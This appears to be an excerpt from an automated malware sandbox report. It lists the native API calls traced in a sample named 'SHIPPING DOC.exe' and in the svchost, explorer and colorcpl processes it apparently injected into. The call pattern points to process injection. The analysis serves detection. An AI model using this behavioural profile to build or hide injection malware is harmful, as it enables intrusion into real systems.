          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672F90 NtProtectVirtualMemory,LdrInitializeThunk,6_2_03672F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_03672EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03672E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03672D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03672D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03672DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672DD0 NtDelayExecution,LdrInitializeThunk,6_2_03672DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03672C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03672CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03674340 NtSetContextThread,6_2_03674340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03674650 NtSuspendThread,6_2_03674650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672BE0 NtQueryValueKey,6_2_03672BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672BA0 NtEnumerateValueKey,6_2_03672BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672B80 NtQueryInformationFile,6_2_03672B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672AF0 NtWriteFile,6_2_03672AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672AB0 NtWaitForSingleObject,6_2_03672AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672F60 NtCreateProcessEx,6_2_03672F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672FA0 NtQuerySection,6_2_03672FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672E30 NtWriteVirtualMemory,6_2_03672E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672EE0 NtQueueApcThread,6_2_03672EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672D00 NtSetInformationFile,6_2_03672D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672DB0 NtEnumerateKey,6_2_03672DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672C60 NtCreateKey,6_2_03672C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672C00 NtQueryInformationProcess,6_2_03672C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672CF0 NtOpenProcess,6_2_03672CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672CC0 NtQueryVirtualMemory,6_2_03672CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03673010 NtOpenDirectoryObject,6_2_03673010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03673090 NtSetValueKey,6_2_03673090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036735C0 NtCreateMutant,6_2_036735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036739B0 NtGetContextThread,6_2_036739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03673D70 NtOpenThread,6_2_03673D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03673D10 NtOpenProcessToken,6_2_03673D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B4A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,6_2_03B4A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B4A042 NtQueryInformationProcess,6_2_03B4A042
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054EA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,6_2_054EA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054EA042 NtQueryInformationProcess,6_2_054EA042
          Source: C:\Windows\explorer.exeCode function: 8_2_09445E12 NtProtectVirtualMemory,8_2_09445E12
          Source: C:\Windows\explorer.exeCode function: 8_2_09444232 NtCreateFile,8_2_09444232
          Source: C:\Windows\explorer.exeCode function: 8_2_09445E0A NtProtectVirtualMemory,8_2_09445E0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_047D2C70
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2C60 NtCreateKey,LdrInitializeThunk,11_2_047D2C60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_047D2CA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2D10 NtMapViewOfSection,LdrInitializeThunk,11_2_047D2D10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_047D2DF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2DD0 NtDelayExecution,LdrInitializeThunk,11_2_047D2DD0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_047D2EA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2F30 NtCreateSection,LdrInitializeThunk,11_2_047D2F30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2FE0 NtCreateFile,LdrInitializeThunk,11_2_047D2FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2AD0 NtReadFile,LdrInitializeThunk,11_2_047D2AD0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2B60 NtClose,LdrInitializeThunk,11_2_047D2B60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_047D2BF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2BE0 NtQueryValueKey,LdrInitializeThunk,11_2_047D2BE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D35C0 NtCreateMutant,LdrInitializeThunk,11_2_047D35C0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D4650 NtSuspendThread,11_2_047D4650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D4340 NtSetContextThread,11_2_047D4340
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2C00 NtQueryInformationProcess,11_2_047D2C00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2CF0 NtOpenProcess,11_2_047D2CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2CC0 NtQueryVirtualMemory,11_2_047D2CC0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2D30 NtUnmapViewOfSection,11_2_047D2D30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2D00 NtSetInformationFile,11_2_047D2D00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2DB0 NtEnumerateKey,11_2_047D2DB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2E30 NtWriteVirtualMemory,11_2_047D2E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2EE0 NtQueueApcThread,11_2_047D2EE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2E80 NtReadVirtualMemory,11_2_047D2E80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2F60 NtCreateProcessEx,11_2_047D2F60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2FB0 NtResumeThread,11_2_047D2FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2FA0 NtQuerySection,11_2_047D2FA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2F90 NtProtectVirtualMemory,11_2_047D2F90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2AF0 NtWriteFile,11_2_047D2AF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2AB0 NtWaitForSingleObject,11_2_047D2AB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2BA0 NtEnumerateValueKey,11_2_047D2BA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D2B80 NtQueryInformationFile,11_2_047D2B80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D3010 NtOpenDirectoryObject,11_2_047D3010
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D3090 NtSetValueKey,11_2_047D3090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D3D70 NtOpenThread,11_2_047D3D70
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D3D10 NtOpenProcessToken,11_2_047D3D10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D39B0 NtGetContextThread,11_2_047D39B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0052A320 NtCreateFile,11_2_0052A320
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0052A3D0 NtReadFile,11_2_0052A3D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0052A450 NtClose,11_2_0052A450
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0052A500 NtAllocateVirtualMemory,11_2_0052A500
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0052A31D NtCreateFile,11_2_0052A31D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0052A44A NtClose,11_2_0052A44A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044AA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,11_2_044AA036
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044A9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,11_2_044A9BAF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044AA042 NtQueryInformationProcess,11_2_044AA042
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044A9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_044A9BB2
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004096A00_2_004096A0
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0042200C0_2_0042200C
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0041A2170_2_0041A217
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004122160_2_00412216
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0042435D0_2_0042435D
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004033C00_2_004033C0
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0044F4300_2_0044F430
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004125E80_2_004125E8
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0044663B0_2_0044663B
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004138010_2_00413801
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0042096F0_2_0042096F
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004129D00_2_004129D0
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004119E30_2_004119E3
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0041C9AE0_2_0041C9AE
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0047EA6F0_2_0047EA6F
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0040FA100_2_0040FA10
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0044EB5F0_2_0044EB5F
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00423C810_2_00423C81
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00411E780_2_00411E78
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00442E0C0_2_00442E0C
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00420EC00_2_00420EC0
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0044CF170_2_0044CF17
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00444FD20_2_00444FD2
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_03CF27C00_2_03CF27C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041D89D6_2_0041D89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041C3F26_2_0041C3F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00409E4C6_2_00409E4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00409E506_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041E79D6_2_0041E79D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FA3526_2_036FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364E3F06_2_0364E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_037003E66_2_037003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E02746_2_036E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C02C06_2_036C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C81586_2_036C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036301006_2_03630100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DA1186_2_036DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F81CC6_2_036F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F41A26_2_036F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_037001AA6_2_037001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D20006_2_036D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036407706_2_03640770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036647506_2_03664750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363C7C06_2_0363C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365C6E06_2_0365C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036405356_2_03640535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_037005916_2_03700591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F24466_2_036F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E44206_2_036E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036EE4F66_2_036EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FAB406_2_036FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F6BD76_2_036F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363EA806_2_0363EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036569626_2_03656962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036429A06_2_036429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0370A9A66_2_0370A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364A8406_2_0364A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036428406_2_03642840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E8F06_2_0366E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036268B86_2_036268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B4F406_2_036B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03682F286_2_03682F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03660F306_2_03660F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E2F306_2_036E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364CFE06_2_0364CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03632FC86_2_03632FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BEFA06_2_036BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640E596_2_03640E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FEE266_2_036FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FEEDB6_2_036FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03652E906_2_03652E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FCE936_2_036FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364AD006_2_0364AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DCD1F6_2_036DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363ADE06_2_0363ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03658DBF6_2_03658DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640C006_2_03640C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03630CF26_2_03630CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E0CB56_2_036E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362D34C6_2_0362D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F132D6_2_036F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0368739A6_2_0368739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E12ED6_2_036E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365B2C06_2_0365B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036452A06_2_036452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0367516C6_2_0367516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362F1726_2_0362F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0370B16B6_2_0370B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364B1B06_2_0364B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F70E96_2_036F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FF0E06_2_036FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036EF0CC6_2_036EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036470C06_2_036470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FF7B06_2_036FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036856306_2_03685630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F16CC6_2_036F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F75716_2_036F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_037095C36_2_037095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DD5B06_2_036DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036314606_2_03631460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FF43F6_2_036FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FFB766_2_036FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B5BF06_2_036B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0367DBF96_2_0367DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365FB806_2_0365FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B3A6C6_2_036B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FFA496_2_036FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F7A466_2_036F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036EDAC66_2_036EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DDAAC6_2_036DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03685AA06_2_03685AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E1AA36_2_036E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036499506_2_03649950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365B9506_2_0365B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D59106_2_036D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AD8006_2_036AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036438E06_2_036438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FFF096_2_036FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03603FD26_2_03603FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03603FD56_2_03603FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FFFB16_2_036FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03641F926_2_03641F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03649EB06_2_03649EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F7D736_2_036F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03643D406_2_03643D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F1D5A6_2_036F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365FDC06_2_0365FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B9C326_2_036B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FFCF26_2_036FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B4A0366_2_03B4A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B4B2326_2_03B4B232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B410826_2_03B41082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B4E5CD6_2_03B4E5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B45B306_2_03B45B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B45B326_2_03B45B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B489126_2_03B48912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B42D026_2_03B42D02
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054EA0366_2_054EA036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054E2D026_2_054E2D02
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054EE5CD6_2_054EE5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054E89126_2_054E8912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054E10826_2_054E1082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054E5B326_2_054E5B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054E5B306_2_054E5B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054EB2326_2_054EB232
          Source: C:\Windows\explorer.exeCode function: 8_2_094442328_2_09444232
          Source: C:\Windows\explorer.exeCode function: 8_2_0943BD028_2_0943BD02
          Source: C:\Windows\explorer.exeCode function: 8_2_094419128_2_09441912
          Source: C:\Windows\explorer.exeCode function: 8_2_0943EB328_2_0943EB32
          Source: C:\Windows\explorer.exeCode function: 8_2_0943EB308_2_0943EB30
          Source: C:\Windows\explorer.exeCode function: 8_2_094475CD8_2_094475CD
          Source: C:\Windows\explorer.exeCode function: 8_2_094430368_2_09443036
          Source: C:\Windows\explorer.exeCode function: 8_2_0943A0828_2_0943A082
          Source: C:\Windows\explorer.exeCode function: 8_2_109320828_2_10932082
          Source: C:\Windows\explorer.exeCode function: 8_2_1093B0368_2_1093B036
          Source: C:\Windows\explorer.exeCode function: 8_2_1093F5CD8_2_1093F5CD
          Source: C:\Windows\explorer.exeCode function: 8_2_109399128_2_10939912
          Source: C:\Windows\explorer.exeCode function: 8_2_10933D028_2_10933D02
          Source: C:\Windows\explorer.exeCode function: 8_2_1093C2328_2_1093C232
          Source: C:\Windows\explorer.exeCode function: 8_2_10936B328_2_10936B32
          Source: C:\Windows\explorer.exeCode function: 8_2_10936B308_2_10936B30
          Source: C:\Windows\explorer.exeCode function: 8_2_10C3F0828_2_10C3F082
          Source: C:\Windows\explorer.exeCode function: 8_2_10C480368_2_10C48036
          Source: C:\Windows\explorer.exeCode function: 8_2_10C4C5CD8_2_10C4C5CD
          Source: C:\Windows\explorer.exeCode function: 8_2_10C40D028_2_10C40D02
          Source: C:\Windows\explorer.exeCode function: 8_2_10C469128_2_10C46912
          Source: C:\Windows\explorer.exeCode function: 8_2_10C492328_2_10C49232
          Source: C:\Windows\explorer.exeCode function: 8_2_10C43B308_2_10C43B30
          Source: C:\Windows\explorer.exeCode function: 8_2_10C43B328_2_10C43B32
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0484E4F611_2_0484E4F6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0484442011_2_04844420
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485244611_2_04852446
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0486059111_2_04860591
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A053511_2_047A0535
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047BC6E011_2_047BC6E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A077011_2_047A0770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047C475011_2_047C4750
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0479C7C011_2_0479C7C0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0483200011_2_04832000
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_048541A211_2_048541A2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_048601AA11_2_048601AA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_048581CC11_2_048581CC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0479010011_2_04790100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0483A11811_2_0483A118
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0482815811_2_04828158
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_048202C011_2_048202C0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0484027411_2_04840274
